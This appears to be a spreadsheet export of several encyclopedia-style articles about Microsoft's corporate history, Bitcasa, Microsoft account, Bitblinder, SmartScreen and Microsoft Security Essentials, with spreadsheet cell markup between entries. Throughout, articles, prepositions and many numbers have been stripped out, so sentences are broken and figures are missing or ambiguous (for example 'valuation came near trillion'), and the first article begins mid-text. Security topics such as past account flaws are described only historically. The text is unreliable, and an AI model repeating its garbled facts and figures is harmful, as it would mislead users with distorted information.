smartphones (2.5% smartphones) made manufacturers (but mostly microsoft). microsoft's share u.s. smartphone market january 2016 2.7%. during summer 2015 company lost $7.6 billion related mobile-phone business, firing 7,800 employees.on march 2016, microsoft announced merger xbox divisions, phil spencer announcing universal windows platform (uwp) apps would focus microsoft's gaming future. january 2017, microsoft showcased intune education bett 2017 education technology conference london. intune education cloud-based application device management service education sector. 2016, company announced laying 1,850 workers, taking impairment restructuring charge $950 million. june 2016, microsoft announced project named microsoft azure information protection. aims help enterprises protect data moves servers devices. november 2016, microsoft joined linux foundation platinum member microsoft's connect(); developer event york. cost platinum membership us$500,000 year. some analysts deemed unthinkable years prior, however, 2001 then-ceo steve ballmer called linux "cancer". microsoft planned launch preview intune education coming weeks", general availability scheduled spring 2017, priced device, volume licensing agreements. january 2018, microsoft patched windows account problems related intel's meltdown security breach. patch issues microsoft azure virtual machines reliant intel's architecture. january microsoft released powershell core macos linux operating systems. february 2018, microsoft killed notification support windows phone devices effectively ended firmware updates discontinued devices. march 2018, microsoft recalled windows change mode windows operating system rather separate unique operating system. march company also established guidelines censor users office using profanity private documents. april 2018, microsoft released source code windows file manager license celebrate program's 20th anniversary. april company expressed willingness embrace open source initiatives announcing azure sphere derivative linux operating system. 2018, microsoft partnered american intelligence agencies develop cloud computing products. project dubbed "azure government" ties joint enterprise defense infrastructure (jedi) surveillance program. june 2018, microsoft officially announced acquisition github $7.5 billion, deal closed october 2018. july 2018, microsoft revealed surface platform public. later month converted microsoft teams gratis. august 2018, microsoft released projects called microsoft accountguard defending democracy. also unveiled snapdragon compatibility windows architecture. august 2018, toyota tsusho began partnership microsoft create fish farming tools using microsoft azure application suite internet things (iot) technologies related water management. developed part researchers kindai university, water pump mechanisms artificial intelligence count number fish conveyor belt, analyze number fish, deduce effectiveness water flow data fish provide. specific computer programs used process fall azure machine learning azure platforms. september 2018, microsoft discontinued skype classic. october 2018, microsoft joined open invention network community despite holding 60,000 patents. november 2018, microsoft agreed supply 100,000 microsoft hololens headsets united states military order "increase lethality enhancing ability detect, decide engage enemy." november 2018, microsoft introduced azure multi-factor authentication microsoft azure. december 2018, microsoft announced project open source release unified extensible firmware interface (uefi) core used microsoft surface hyper-v products. project promotes idea firmware service. month, microsoft announced open source implementation windows forms windows presentation foundation (wpf) allow movement company toward transparent release frameworks used developing windows desktop applications software. december also company discontinue microsoft edge project favor chromium backends browsers.on february 2019, microsoft corp said offer cyber security service accountguard markets europe including germany, france spain, close security gaps protect customers political space hacking. february 2019, hundreds microsoft employees protested company's profiteering $480 million contract develop virtual reality headsets united states army. 2020–present: acquisitions, xbox series x/s, windows march 2020, microsoft announced acquiring affirmed networks $1.35 billion. covid-19 pandemic, microsoft closed retail stores indefinitely health concerns. july 2020, microsoft announced plans close mixer service, planning move existing partners facebook gaming.on july 2020, reported microsoft talks acquire tiktok trump administration ordered bytedance divest ownership application u.s. august 2020, speculation deal, donald trump stated microsoft could application, however completed september 2020, united states department treasury receive portion through.on august 2020, microsoft stopped xcloud game streaming test devices. according microsoft, future xcloud remains unclear potentially microsoft's hands. apple imposed strict limit "remote desktop clients" means applications allowed connect user-owned host device gaming console owned user. september 2020, microsoft announced intent acquire video game company zenimax media, parent company bethesda softworks, $7.5 billion, deal expected occurred second half 2021 fiscal year. march 2021, acquisition finalized zenimax media became part microsoft's xbox game studios division. total price deal $8.1 billion.on september 2020, microsoft announced exclusive license openai’s gpt-3 artificial intelligence language generator. previous version gpt-3, called gpt-2, made headlines “too dangerous release” numerous capabilities, including designing websites, prescribing medication, answering questions penning articles. november 2020, microsoft released xbox series xbox series video game consoles.in april 2021, microsoft announced would nuance communications approximately billion. acquisition nuance completed march 2022. 2021, part strong quarterly earnings spurred covid-19 pandemic, microsoft's valuation came near trillion. increased necessity remote work distance education drove demand cloud computing grew company's gaming sales.on june 2021, microsoft announced windows livestream. announcement came confusion microsoft announced windows would last version operating system; released third quarter 2021. released general public october 2021.in october 2021, microsoft announced began rolling end-to-end encryption (e2ee) support microsoft teams calls order secure business communication using video conferencing software. users ensure calls encrypted utilize security code parties call must verify respective ends. october microsoft acquired ally.io, software service measures companies' progress okrs. microsoft plans incorporate ally.io viva family employee experience products.on january 2022, microsoft announced acquisition american video game developer holding company activision blizzard all-cash deal worth $68.7 billion. activision blizzard best known producing franchises, including limited warcraft, diablo, call duty, starcraft, candy crush saga, crash bandicoot, spyro dragon, skylanders, overwatch. activision microsoft released statements saying acquisition benefit businesses metaverse, many microsoft's acquisition video game studios attempt compete meta platforms, thestreet referring microsoft wanting become "the disney metaverse". microsoft released statements regarding activision's recent legal controversies regarding employee abuse, reports alleged activision bobby kotick, major target controversy, leave company acquisition finalized. deal expected close 2023 followed review federal trade commission. corporate affairs board directors company board directors made mostly company outsiders, customary publicly traded companies. members board directors july 2020 satya nadella, reid hoffman, hugh johnston, teri list-stoll, sandi peterson, penny pritzker, charles scharf, arne sorenson, john stanton, john thompson, emma walmsley padmasree warrior. board members elected every year annual shareholders' meeting using majority vote system. there four committees within board oversee specific matters. these committees include audit committee, handles accounting issues company including auditing reporting; compensation committee, approves compensation employees company; governance nominating committee, handles various corporate matters including nomination board; regulatory public policy committee, includes legal/antitrust matters, along privacy, trade, digital safety, artificial intelligence, environmental sustainability.on march 2020, gates announced leaving board directors microsoft berkshire hathaway focus philanthropic efforts. according aaron tilley wall street journal "marking biggest boardroom departure tech industry since death longtime rival apple inc. co-founder steve jobs."on january 2022, wall street journal reported microsoft's board directors plans hire external firm review sexual harassment gender discrimination policies, release summary company handled past allegations misconduct bill gates corporate executives. chief executives bill gates (1975–2000) steve ballmer (2000–2014) satya nadella (2014–present) financial when microsoft went public launched initial public offering (ipo) 1986, opening stock price $21; trading day, price closed $27.75. july 2010, company's nine stock splits, shares would multiplied 288; today, given splits factors, would cost cents.: 235–236 stock price peaked 1999 around $119 ($60.928, adjusting splits). company began offer dividend january 2003, starting eight cents share fiscal year followed dividend sixteen cents share subsequent year, switching yearly quarterly dividends 2005 eight cents share quarter special one-time payout three dollars share second quarter fiscal year. though company subsequent increases dividend payouts, price microsoft's stock remained steady years.standard poor's moody's investors service given rating microsoft, whose assets valued billion compared $8.5 billion unsecured debt. consequently, february 2011 microsoft released corporate bond amounting $2.25 billion relatively borrowing rates compared government bonds. first time years apple inc. surpassed microsoft 2011 quarterly profits revenues slowdown sales continuing huge losses microsoft's online services division (which contains search engine bing). microsoft profits $5.2 billion, apple inc. profits billion, revenues $14.5 billion $24.7 billion respectively. microsoft's online services division continuously loss-making since 2006 2011 lost $726 million. this follows loss $2.5 billion year 2010.on july 2012, microsoft posted first quarterly loss ever, despite earning record revenues quarter fiscal year, loss $492 million writedown related advertising company aquantive, acquired $6.2 billion back 2007. january 2014, microsoft's market capitalization stood $314b, making largest company world market capitalization. november 2014, microsoft overtook exxonmobil become second most-valuable company market capitalization, behind apple inc. total market value $410b—with stock price hitting $50.04 share, highest since early 2000. 2015, reuters reported microsoft corp earnings abroad $76.4 billion untaxed internal revenue service. under u.s. law, corporations income overseas profits profits brought united states. november 2018, company $480 million military contract u.s. government bring augmented reality (ar) headset technology weapon repertoires american soldiers. two-year contract result follow-on orders 100,000 headsets, according documentation describing bidding process. contract's lines augmented reality technology seems ability enable bloodless battles battle", suggesting actual combat training going essential aspect augmented reality headset capabilities. subsidiaries microsoft international business. such, needs subsidiaries present whatever national markets chooses harvest. example microsoft canada, established 1985. other countries similar installations, funnel profits back redmond distribute dividends holders msft stock. marketing 2004, microsoft commissioned research firms independent studies comparing total cost ownership (tco) windows server 2003 linux; firms concluded companies found windows easier administrate linux, thus using windows would administrate faster resulting lower costs company (i.e. lower tco). this spurred wave related studies; study yankee group concluded upgrading version windows server another costs fraction switching costs windows server linux, although companies surveyed noted increased security reliability linux servers concern locked using microsoft products. another study, released open source development labs, claimed microsoft studies "simply outdated one-sided" survey concluded linux lower linux administrators managing servers average reasons.as part "get facts" campaign, microsoft highlighted .net framework trading platform developed partnership accenture london stock exchange, claiming provided "five nines" reliability. after suffering extended downtime unreliability london stock exchange announced 2009 planning drop microsoft solution switch linux-based 2010.in 2012, microsoft hired political pollster named mark penn, york times called "famous bulldozing" political opponents executive vice-president, advertising strategy. penn created series negative advertisements targeting microsoft's chief competitors, google. advertisements, called "scroogled", attempt make case google "screwing" consumers search results rigged favor google's paid advertisers, gmail violates privacy users place results related content emails shopping results, favor google products. tech publications like techcrunch highly critical advertising campaign, google employees embraced layoffs july 2014, microsoft announced plans 18,000 employees. microsoft employed 127,104 people june 2014, making percent reduction workforce biggest microsoft ever. this included 12,500 professional factory personnel. previously, microsoft eliminated 5,800 jobs 2009 line great recession 2008–2017. september 2014, microsoft laid 2,100 people, including people seattle–redmond area, company headquartered. firings came second wave layoffs previously announced. this brought total number 15,000 18,000 expected cuts. october 2014, microsoft revealed almost done elimination 18,000 employees, largest-ever layoff sweep. july 2015, microsoft announced another 7,800 cuts next several months. 2016, microsoft announced another 1,850 cuts mostly nokia mobile phone division. result, company record impairment restructuring charge approximately $950 million, approximately $200 million relate severance payments. united states government microsoft provides information reported bugs software intelligence agencies united states government, prior public release fix. microsoft spokesperson stated corporation runs several programs facilitate sharing information u.s. government. following media reports prism, nsa's massive electronic surveillance program, 2013, several technology companies identified participants, including microsoft. according leaks said program, microsoft joined prism program 2007. however, june 2013, official statement microsoft flatly denied participation program: provide customer data receive legally binding order subpoena never voluntary basis. addition ever comply orders requests specific accounts identifiers. government broader voluntary national security program gather customer data, participate it." during first months 2013, microsoft received requests affected 15,000 15,999 accounts. december 2013, company made statement emphasize fact take customers' privacy data protection seriously, even saying "government snooping potentially constitutes 'advanced persistent threat,' alongside sophisticated malware cyber attacks". statement also marked beginning three-part program enhance microsoft's encryption transparency efforts. july 2014, part program opened first many) microsoft transparency center, provides "participating governments ability review source code products, assure software integrity, confirm "back doors." microsoft also argued united states congress enact strong privacy regulations protect consumer data.in april 2016, company sued u.s. government, arguing secrecy orders preventing company disclosing warrants customers violation company's customers' rights. microsoft argued unconstitutional government indefinitely microsoft informing users government requesting emails documents, fourth amendment made people businesses right know government searches seizes property. october 2017, microsoft said would drop lawsuit result policy change united states department justice (doj). "changed data request rules alerting internet users agencies accessing information." corporate identity corporate culture technical reference developers articles various microsoft magazines microsoft systems journal (msj) available microsoft developer network (msdn). msdn also offers subscriptions companies individuals, expensive subscriptions usually offer access pre-release beta versions microsoft software. april 2004, microsoft launched community site developers users, titled cha</t>
  </si>
  <si>
    <t>Bitcasa</t>
  </si>
  <si>
    <t>bitcasa, inc. american cloud storage company founded 2011 louis, missouri. company later based mountain view, california shut 2017.bitcasa provided client software microsoft windows, android browsers. client pending apple approval. former product, infinite drive, provided centralized storage included unlimited capacity, client-side encryption, media streaming, file versioning backups, multi-platform mobile access. 2013 bitcasa moved tiered storage model, offering $99/year infinite $999/year. october 2014, bitcasa announced discontinuation infinite drive; $999/year, users would 10tb storage. infinite drive users would required migrate pricing plans delete account. 2016, bitcasa discontinued offering cloud storage consumers, alleging focusing business products. history company started idea finalist techcrunch disrupt conference september 2011. 2012 tony recruited vice president engineering frank meehan joined company's board directors. june 2012 bitcasa closed million investment. investors included: crunchfund, pelion venture partners, horizons ventures, andreessen horowitz, samsung ventures first round capital.ceo brian taptich announced 2017 bitcasa acquired intel. intel spokesperson later clarified intel acquired bitcasa. products services bitcasa provided client software browsers, microsoft windows, linux mobile android. windows versions include vista, windows windows bitcasa products provide centralized streaming storage devices simultaneous real-time access files. files uploaded device instantly available devices. bitcasa require file syncing devices. centralized storage eliminates need duplicate files across devices wait files become synchronized.the company patent pending "infinite storage" algorithm designed reduce actual storage space identifying duplicate content providing encryption stored data. according popular mechanics magazine, bitcasa uses convergent encryption method whereby client's data assigned anonymous identifier uploaded. data already exists bitcasa servers (such popular song), uploaded instead earmarked available download client. this protocol said reduce upload time. bitcasa's encryption method reportedly cloaks data still client's computer blocks data sent enterprise-grade aes-256 encryption method data cloud storage. according extremetech, service gives users access ownership rights data.in review gizmodo australia, bitcasa's cloud service described "winner" "pricier competitors" supported mac, android platforms. mobile users could access infinite drive mobile apps android, windows browsers support offline viewing files. collects displays individual media types photos, video, music, documents, independently folder hierarchy stored video files streamed auto-transcoded based device bandwidth. items uploaded downloaded shared directly social media sites. files size shared link distributed email, text after initial server migration, apps android, browsers updated, effectively rendering devices unusable service. security september 2011 article published extreme tech said bitcasa's convergent encryption based system "mostly" safe risks associated pricing changes november 2013 november 2013, company announced infinite storage offering would increase price. move sparked intense reaction users company's forum, even though existing users grandfathered original pricing plan. reactions bloggers particularly critical. announcement pricing plans change bitcasa blog commented heavily users. this post, ensuing comments removed internet bitcasa. bitcasa introduced interface developers. october 2014 october 2014, bitcasa announced would removing grandfathered 'infinite' plans. although company assured customers plans would continued long cancelled service(the company removed official blog post this, though still available wayback machine. bitcasa backtracked 'lack demand' 'abuse'.the company instead offered previous clients packages regular users $10/month ($99 annually) $99/month 10tb ($999 annually).the company gave users days migrate download data, would deleted. this move criticized many users physically possible download rates provided bitcasa.as result system migration, users data loss, replaceable. angry customers gave company feedback, community forum became less active. company offered yearly subscribers right cancel prorated refund. however, disabled ability cancel accounts refused delete accounts support system.on november 2014, northern californian district judge william alsup granted temporary restraining order, enjoining bitcasa deleting disabling access infinite plan subscribers' data. bitcasa filed response november, challenging legality tro. apparent result restraining order, bitcasa announced 5-day extension deadline email users november email mention restraining order. hearing 10.00 november; bitcasa 'won' lawsuit.in february 2015, community forum shut down. april 2016 april 2016, company switched free plan free trial tier. users account prior april would automatically start trial 60-day trial, user changed paid plan, account data deleted server.on april 2016, bitcasa announced would discontinue cloud storage service, focus business products. users 2016 download data, user data could deleted. bitcasa shut consumer cloud storage 2016, offering products developers. september 2016 after four months, refund customers website bitcasa inaccessible. also comparison file hosting services comparison online backup services references</t>
  </si>
  <si>
    <t>Microsoft account</t>
  </si>
  <si>
    <t>microsoft account (previously known microsoft passport, .net passport, windows live single sign-on microsoft user account microsoft customers microsoft services (like outlook.com), devices running microsoft's current operating systems (e.g. microsoft windows computers tablets, windows phones, xbox consoles), microsoft application software (including visual studio). history microsoft passport, predecessor windows live originally positioned single sign-on service commerce. microsoft passport received much criticism. prominent critic cameron, author laws identity, questioned microsoft passport violations laws. joined microsoft 1999 company acquired chief architect access identity 2019 retirement, helping address violations design windows live identity meta-system. consequence, windows live positioned single sign-on service commerce, choice many among identity systems. december 1999, microsoft neglected annual "passport.com" domain registration network solutions. oversight made hotmail, used site authentication, unavailable december linux consultant, michael chaney, paid next (christmas), hoping would solve issue downed site. payment resulted site available next morning. autumn 2003, similar good samaritan helped microsoft missed payment "hotmail.co.uk" address, although downtime resulted.in 2001, electronic frontier foundation's staff attorney deborah pierce criticized microsoft passport potential threat privacy revealed microsoft would full access usage customer information. privacy terms quickly updated microsoft allay customers' fears. july august 2001, electronic privacy information center coalition fourteen leading consumer groups filed complaints federal trade commission (ftc) alleging microsoft passport system violated section federal trade commission (ftca), prohibits unfair deceptive practices trade.microsoft pushed non-microsoft entities create internet-wide unified-login system. examples sites used microsoft passport ebay monster.com, 2004 agreements cancelled. august 2009, expedia sent notice stating longer support microsoft passport windows live 2012, windows live renamed microsoft account. overview microsoft account allows users sign websites support service using single credentials. users' credentials checked microsoft account-enabled websites, microsoft account authentication server. user signing microsoft account-enabled website first redirected nearest authentication server, asks username password connection. user select computer remember login: newly signed-in user encrypted time-limited cookie stored computer receives triple encrypted id-tag previously agreed upon authentication server microsoft account-enabled website. this id-tag sent website, upon website plants another encrypted http cookie user's computer, also time-limited. long cookies valid, user required supply username password. user actively logs microsoft account, cookies removed. microsoft account offers user different methods creating account: existing e-mail address: users able valid e-mail address sign microsoft account. service turns requesting user's e-mail address microsoft account. users also choose password choice. sign microsoft e-mail address: users also sign e-mail account microsoft's webmail services designated domains (i.e. @hotmail.com @outlook.com used microsoft account sign microsoft account-enabled websites.the e-mail domains @live.com, @msn.com @passport.com discontinued. microsoft websites, services, apps bing, xbox live microsoft account mean identifying users. there also several companies hoyts website hosted ninemsn. windows later option link windows user account microsoft account, thus automatically logging users microsoft account whenever service accessed. starting windows server 2012, windows allows users directly authenticate using microsoft account rather local domain user. profile feature microsoft account service profile manager, named profile, formerly part windows live. displays information particular user, recent activities, relationship windows live users. also provides ability connect others skype, social networks facebook, myspace linkedin. users share personal information interests hobbies, social information favorites quote, hometown, places lived previously. profile also allows users modify privacy settings decide shared. authentication august 2007, microsoft released windows live authentication sdk, enabling developers integrate windows live websites running broad range server platforms including asp.net (c#), java, perl, php, python ruby. support openid october 2008, microsoft announced publicly committed supporting openid framework, windows live becoming openid provider. this would allow users windows live sign website supports openid authentication. there update microsoft's planned implementation openid since august 2009, however since november 2013 microsoft publicly participated openid connect interoperability testing. login methods addition using account password, users login microsoft account accepting mobile notification sent mobile device microsoft authenticator, fido2 security token using windows hello. users also two-factor authentication getting time-based, single-use code text, phone call using authenticator app. features microsoft account website users manage identity. features microsoft account include: updating user's information first last names, address, etc. associated account; updating user settings, preferred language preferences email communications; changing resetting user passwords; close account; view billing details associated accounts. integrated following list computer programs services support using microsoft account credentials required authentication process. windows later windows server 2012 later windows components calendar cortana groove music feedback mail movies microsoft store outlook express people windows messenger windows phone later windows phone store bing exchange online exchange online protection microsoft office office office online onedrive (formerly skydrive) outlook.com (formerly hotmail) skype system center advisor visual studio microsoft azure (formerly windows azure) windows insider program windows live messenger windows movie maker windows photo gallery xbox network security vulnerabilities june 2007, erik duindam, developer netherlands, reported privacy identity risk, saying "critical error made microsoft programmers allows everyone create virtually e-mail address." procedure found allow users register invalid currently used e-mail addresses. upon registration valid e-mail address, e-mail verification link sent user. before using however, user allowed change e-mail address exist, e-mail address currently used someone else. verification link caused windows live system confirm account verified email address. that flaw fixed days later, june 2007.on april 2012, microsoft fixed flaw hotmail's password reset system allowed anyone reset password hotmail account. company notified flaw researchers vulnerability responded within hours widespread attacks exploitation technique spread quickly across internet.on december 2015, security researcher discovered vulnerability adobe experience manager (aem) software used signout.live.com reported microsoft security response center (msrc). this vulnerability enabled full-administrative access publish nodes' osgi console made possible execute code inside upload custom osgi bundle. vulnerability confirmed resolved 2016. also identity management identity management system list single sign-on implementationsother identity services active directory federation services openid light-weight identity yadis windows cardspaceidentity management liberty alliance oasis (organization) windows hello references further reading creating microsoft account introduction windows live whitepaper provides brief overview windows live service context microsoft's overall identity strategy. understanding windows live delegated authentication whitepaper describes site windows live delegated authentication system permission access users' information windows live services. windows live federation whitepaper describes concept identity federation offers considerable detail windows live service supports external links official website</t>
  </si>
  <si>
    <t>Bitblinder</t>
  </si>
  <si>
    <t>bitblinder open source software program allows users share bandwidth addresses order anonymously download torrents browse internet. first released june 2009. open-source license. developed josh albrecht matthew kaniaris innominet. software based principles uses create anonymity designed faster encourage file sharing addition anonymous browsing. currently comes bundled anonymous browser based mozilla firefox anonymous bittorrent client based bittornado. software planned provide anonymity instant messaging internet relay chat.usage software beta testing offered initially invitation only. features included 4-step slider allowed adjusting communication speed, traded anonymity. users allowed transfer gigabytes data network initially; additional traffic could earned setting one's computer relay server, could paid for. 2010 review downloadsquad pointed out, "bitblinder work without community participation: there's online help proxify torrent traffic." software listed "download week" maximumpc 2010.as 2012, bitblinder appears defunct page software client longer functional. also anonymous (anonymity network) references external links official website</t>
  </si>
  <si>
    <t>Microsoft SmartScreen</t>
  </si>
  <si>
    <t>smartscreen (officially called windows smartscreen, windows defender smartscreen smartscreen filter different places) cloud-based anti-phishing anti-malware component included several microsoft products, including windows later, internet explorer, microsoft edge outlook.com. smartscreen intelligence also used backend microsoft bing. smartscreen business unit includes intelligence platform, backend, serving frontend, policy, expert graders, closed-loop intelligence (including machine learning statistical techniques) designed help protect microsoft customers safety threats like social engineering drive-by downloads. smartscreen internet explorer internet explorer phishing filter smartscreen first introduced internet explorer known phishing filter. phishing filter check every website visited user, known suspicious. internet explorer smartscreen filter with release internet explorer phishing filter renamed smartscreen extended include protection socially engineered malware. every website download checked local list popular legitimate websites; site listed, entire address sent microsoft checks. labeled impostor harmful, internet explorer show screen prompting site reported harmful visited. from user either visit homepage, visit previous site, continue unsafe page. user attempts download file location reported harmful, download cancelled. effectiveness smartscreen filtering reported superior socially engineered malware protection browsers.according microsoft, smartscreen technology used internet explorer successful phishing malicious sites blocking socially engineered malware.beginning internet explorer smartscreen enforced using group policy. internet explorer application reputation building smartscreen filter introduced internet explorer internet explorer protection malware downloads extended smartscreen application reputation detects untrustworthy executables. this warns person downloading executable program without safe reputation, site safe reputation. internet explorer mobile internet explorer mobile first release internet explorer mobile support smartscreen filter. microsoft edge microsoft edge microsoft's browser beginning windows originally built windows platform powering internet explorer, later rebuilt google's chromium browser stack cross-platform onto macos down-level windows below. smartscreen shipped version microsoft edge, mostly internet explorer parity, progressive versions adding protection improvements targeting consumer threat classes like tech support scams adding enterprise configurability features. addressed criticisms october 2017, criticisms regarding submission methods addressed creation report unsafe site submission page. prior 2017, microsoft required user visit potentially dangerous website in-browser reporting tool, potentially exposing users dangerous content. 2017, microsoft reversed policy adding submission page, allowing user submit arbitrary without visit website. smartscreen filter microsoft outlook previously bypassable data internet explorer. some phishing attacks phishing email linking front-end unknown microsoft; clicking inbox opens internet explorer; loaded website then, using client-side server-side redirections, redirects user malicious site. original implementation smartscreen, "report website" option internet explorer reported currently-open page (the final redirect chain); original referrer phishing attack reported microsoft remained accessible. this mitigated beginning early versions microsoft edge sending full redirection chain microsoft analysis. smartscreen windows windows windows smartscreen filtering desktop level, performing reputation checks default file application downloaded internet, introduced windows similar smartscreen works internet explorer program established good reputation, user alerted running program harm computer. when smartscreen left default settings, administrator needs launch program. microsoft faced concerns surrounding privacy, legality effectiveness system, suggesting automatic analysis files (which involves sending cryptographic hash file user's address server) could used build database users' downloads online, outdated protocol communication could allow attacker eavesdrop data. response, microsoft later issued statement noting addresses collected part normal operation service would periodically deleted, smartscreen windows would security reasons, information gathered smartscreen would used advertising purposes sold third parties. windows windows beginning windows microsoft placed smartscreen settings windows defender security center.further windows windows updates added enterprise configurability part microsoft's enterprise endpoint protection product. smartscreen outlook outlook.com uses smartscreen protect users unsolicited e-mail messages (spam/junk), fraudulent emails (phishing) malware spread e-mail. after initial review body text, system focuses hyperlinks attachments. junk mail (spam) filter spam, smartscreen filter uses machine learning microsoft research learns known spam threats user feedback emails marked "spam" user. over time, preferences help smartscreen filter distinguish characteristics unwanted legitimate e-mail also determine reputation senders number emails checked. using algorithms reputation sender rating (spam confidence level score) assigned e-mail message (the lower score, desirable). score considered spam, message delivered recipient's inbox. score considered spam delivered recipient's junk folder. scores considered suspected spam, score considered certainly spam. score email found various x-headers received email. phishing smartscreen filter also analyses email messages fraudulent suspicious links. suspicious characteristics found email, message either directly sent spam folder information message warns suspect properties. smartscreen also protects spoofed domain names (spoofing) emails verify whether email sent domain claims sent. this, uses technology sender domainkeys identified mail (dkim). smartscreen filter also ensures email authenticated senders distinguish easily placing green-shield icon subject line emails. effectiveness browser social engineering protection late 2010, results browser malware testing undertaken labs published. study looked browser's capability prevent users following socially engineered links malicious nature downloading malicious software. test browser's ability block malicious pages code. according labs, internet explorer blocked malware downloads compared internet explorer smartscreen application reputation feature opposed achieved firefox, chrome, safari; google safe browsing malware filter. opera found block malware. smartscreen filter also noted adding legitimate sites blocklists almost instantaneously, opposed several hours took blocklists updated browsers. early 2010, similar tests given internet explorer passing grade, improvement attributed "continued investments improved data intelligence". comparison, research showed chrome firefox safari scored 11%, respectively. opera scored failing "detect socially engineered malware samples".in july 2010, microsoft claimed smartscreen internet explorer blocked billion attempts access sites containing security risks. according microsoft, smartscreen filter included outlook.com blocks billion unwanted e-mails daily reaching users. microsoft also claims incoming email junk mail test cascade insights says half junk mail still arrives inbox users. september 2011 blog post, microsoft stated billion attempted malware attacks million attempted phishing attacks stopped. criticism validity browser protection tests manufacturers browsers criticized third-party tests claim internet explorer superior phishing malware protection compared chrome, firefox, opera. criticisms focused mostly lack transparency urls tested lack consideration layered security additional browser, google commenting "the report clearly states evaluate browser security related vulnerabilities plug-ins browsers themselves", opera commenting results appeared "odd received results data providers" "social malware protection indicator overall browser security". windows malware protection smartscreen builds reputation based code signing certificates identify author software. this means reputation built, versions application signed certificate maintain reputation. however, code signing certificates need renewed every years. smartscreen relate renewed certificate expired one. this means reputations need rebuilt every years, users getting frightening messages meantime. extended validation (ev) certificates seem avoid issue, expensive difficult obtain small developers. smartscreen filter creates problem small software vendors distribute updated version installation binary files internet. whenever updated version released, smartscreen responds stating file commonly downloaded therefore install harmful files system. this fixed author digitally signing distributed software. reputation based file's hash signing certificate well. common distribution method authors bypass smartscreen warnings pack installation program (for example setup.exe) zip-archive distribute way, though confuse novice users. another criticism smartscreen increases cost non-commercial small scale software development. developers either purchase standard code signing certificates expensive extended validation certificates. extended validation certificates allow developer immediately establish reputation smartscreen often unaffordable people developing software either free immediate profit. standard code signing certicates however pose "catch-22" developers, since smartscreen warnings make people reluctant download software, consequence downloads requires first passing smartscreen, passing smartscreen requires getting reputation getting reputation dependent downloads. also anti-phishing software google safe browsing macos gatekeeper references external links detailed microsoft smartscreen filter</t>
  </si>
  <si>
    <t>Microsoft Security Essentials</t>
  </si>
  <si>
    <t>microsoft security essentials (mse) antivirus software (av) product provides protection different types malicious software, computer viruses, spyware, rootkits, trojan horses. prior version 4.5, windows windows vista, windows windows later versions, built-in components known windows defender. later versions windows license agreement allows home users small businesses install product free-of-charge. replaces windows live onecare, discontinued commercial subscription-based service, free windows defender, protected users spyware windows built upon scanning engine virus definitions microsoft antivirus products, provides real-time protection, constantly monitoring activities computer, scanning files created downloaded, disabling detected threats. lacks onecare personal firewall forefront endpoint protection centralized management features. microsoft's announcement software november 2008, mixed reactions industry. symantec, mcafee kaspersky lab—three competing independent software vendors—dismissed unworthy competitor, technologies avast software appreciated potential expand consumers' choice software. avg, mcafee, sophos trend micro claimed integration product microsoft windows would violation competition law. product received generally positive reviews praising user interface, resource usage freeware license. secured av-test certification october 2009, demonstrated ability eliminate widely encountered malware. lost certification october 2012; june 2013, achieved lowest possible protection score, zero. however, microsoft significantly improved product couple years preceding february 2018, achieved av-test's "top product" award detecting samples used test. according march 2012 report anti-malware specialist opswat, popular product north america second popular world, resulted appearance several rogue antivirus programs impersonate features microsoft security essentials automatically checks downloads latest virus definitions microsoft update updated three times day. users alternatively download updates manually microsoft security portal website. september 2011, faulty definition update caused product incorrectly google chrome malware. issue resolved within three hours. originally windows windows vista windows although versions later windows microsoft stopped producing automatic definition updates windows july 2015 (however, manual definition updates still available windows users older versions mse).mse built upon foundation microsoft security products; anti-malware engine known microsoft malware protection engine (msmpeng) virus definitions. personal firewall component onecare centralized management features forefront endpoint protection.mse provides real-time protection, constantly monitoring activities computer, scanning files created downloaded internet. quarantines detected threats prompts user input deal them. response received within minutes, suspected threats handled according default actions defined application's settings. depending settings, also create system restore checkpoints removing detected malware. part real-time protection, reports suspicious behaviors monitored programs microsoft active protection service (maps, formerly microsoft spynet) default. report matches newly discovered malware threat unreleased virus definition, definition downloaded remove threat.hardware requirements product depend operating system; computer running windows vista windows requires processor, ram, computer monitor display resolution least pixels, free hard disk space stable internet connection. development november 2008, microsoft announced plans free consumer security product, codenamed morro. this development marked change microsoft's consumer marketing strategy: instead offering subscription-based security product host tools, backup personal firewall, morro would offer free protection smaller impact system resources. barzdukas, senior director product management online services windows division microsoft, announced morro would directly compete commercial software; rather focused percent users would protection. june 2009, official name morro revealed: microsoft security essentials.on june 2009, microsoft released public beta 75,000 users united states, israel, china brazil. anticipated available markets languages, product scheduled release 2009; final build released september 2009. version almost year initial release, microsoft quietly released second version. entered technical preview stage july 2010, final build released december 2010. includes network inspection system (nis), network intrusion detection system works windows vista windows well anti-malware engine employs heuristics malware detection. version integrates internet explorer protect users web-based threats. requires separate definition updates. version sixteen months release version 2.0, microsoft skipped version released microsoft security essentials 4.0. public beta program started november 2011, microsoft sent invitations potential participants without announcing version number. first beta version released november 2011, final build april 2012. microsoft subsequently initiated pre-release program provides volunteers latest beta version accepts feedback. version february 2014, version entered beta stage. day, microsoft announced starting version, windows would supported. older versions would continue receive automatic virus definition updates july 2015 (afterwards users older versions continue manually update definitions using microsoft's site). version 4.10 latest version 4.10 released november 2016. version 4.10.209.0 windows vista windows this update fixes introduced earlier version 4.10.205.0 removed "scan microsoft security essentials" entry right-click context menu files folders. discontinuation support officially ended windows vista windows older versions still function systems; however, latest definition updates longer compatible. although support windows ended january 2020 microsoft continue update virus definitions existing users 2023.microsoft security essentials windows later, security subsystem, windows defender. september 2011, build conference anaheim, california, microsoft unveiled developer preview windows security component capable preventing infected flash memory compromising system boot process. september, windows developer's blog confirmed windows defender windows would take role virus protection. included video, jason garms microsoft showed windows defender registered action center spyware protection tool, blocks drive-by malware. march 2012, softpedia reviewed consumer preview windows noted similarity appearance windows defender microsoft security essentials beta. according softpedia, windows setup requires microsoft security essentials uninstalled upgrading windows licensing product's license agreement allows home users download, install unlimited number computers households free charge, long computer legitimately licensed copy microsoft windows. since october 2010, small businesses also allowed install product devices, academic institutions governmental locations forbidden, reverse-engineering, decompiling disassembling product working around designed limitations.mse requires registration personal information submitted installation; however, validity operating system's license verified installation using windows genuine advantage system. said license found invalid, software notify user cease operate period time. reception industry response announcement debut microsoft security essentials mixed responses industry. symantec, mcafee kaspersky lab, three competing vendors, claimed inferior software. jens meggers, symantec's vice president engineering norton products, dismissed "very average nothing outstanding". powledge symantec urged customers mindful protection chose, bearing mind onecare offered "substandard protection" "inferior user experience". joris evers, director worldwide public relations mcafee stated "with onecare's market share less understand microsoft's decision shift attention core business." justin priestley kaspersky stated microsoft "continued hold market share consumer market, expect exit onecare change playing field drastically."avast software said ambivalent view towards product. vincent steckler, avast software wrote blog post "mse silver bullet also sequel care [sic] claim." representative 